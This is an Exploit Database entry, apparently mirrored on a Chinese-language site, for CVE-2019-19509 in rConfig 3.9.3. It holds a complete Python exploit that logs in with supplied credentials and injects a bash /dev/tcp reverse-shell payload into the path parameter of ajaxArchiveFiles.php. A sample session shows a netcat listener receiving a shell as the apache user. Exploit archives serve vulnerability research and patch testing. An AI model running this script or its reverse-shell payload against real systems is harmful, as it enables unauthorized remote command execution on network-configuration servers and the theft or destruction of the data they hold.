rConfig 3.9.3 – Authenticated Remote Code Execution

• Exploit Database
• 48 阅读

• 作者： vikingfr
  日期： 2020-01-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/47982/

• # Exploit Title: rConfig 3.9.3 - Authenticated Remote Code Execution
  # Date: 2019-11-07
  # CVE-2019-19509
  # Exploit Author: vikingfr
  # Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)
  # Software Link : http://files.rconfig.com/downloads/scripts/centos7_install.sh
  # Version: tested v3.9.3
  # Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24
  #
  # Notes : If you want to reproduce in your lab environment follow those links :
  # http://help.rconfig.com/gettingstarted/installation
  # then
  # http://help.rconfig.com/gettingstarted/postinstall
  #
  # $ python3 rconfig_CVE-2019-19509.py https://192.168.43.34 admin root 192.168.43.245 8081
  # rconfig - CVE-2019-19509 - Web authenticated RCE
  # [+] Logged in successfully, triggering the payload...
  # [+] Check your listener !
  # ...
  # $ nc -nvlp 8081
  # listening on [any] 8081 ...
  # connect to [192.168.43.245] from (UNKNOWN) [192.168.43.34] 34458
  # bash: no job control in this shell
  # bash-4.2$ id
  # id
  # uid=48(apache) gid=48(apache) groups=48(apache)
  # bash-4.2$ 
  
  #!/usr/bin/python3
  
  import requests
  import sys
  import urllib.parse
  from requests.packages.urllib3.exceptions import InsecureRequestWarning
  requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
  
  print ("rconfig - CVE-2019-19509 - Web authenticated RCE")
  
  if len(sys.argv) != 6:
  print ("[+] Usage : ./rconfig_exploit.py https://target username password yourIP yourPort")
  exit()
  
  target = sys.argv[1]
  username = sys.argv[2]
  password = sys.argv[3]
  ip = sys.argv[4]
  port = sys.argv[5]
  payload = '''`bash -i>& /dev/tcp/{0}/{1} 0>&1`'''.format(ip, port)
  
  request = requests.session()
  
  login_info = {
  "user": username,
  "pass": password,
  "sublogin": 1
  }
  
  login_request = request.post(
  target+"/lib/crud/userprocess.php",
   login_info,
   verify=False,
   allow_redirects=True
   )
  
  dashboard_request = request.get(target+"/dashboard.php", allow_redirects=False)
  
  if dashboard_request.status_code == 200:
  print ("[+] Logged in successfully, triggering the payload...")
  encoded_request = target+"/lib/ajaxHandlers/ajaxArchiveFiles.php?path={0}&ext=random".format(urllib.parse.quote(payload))
  print ("[+] Check your listener !")
  exploit_req = request.get(encoded_request)
  
  elif dashboard_request.status_code == 302:
  print ("[-] Wrong credentials !")
  exit()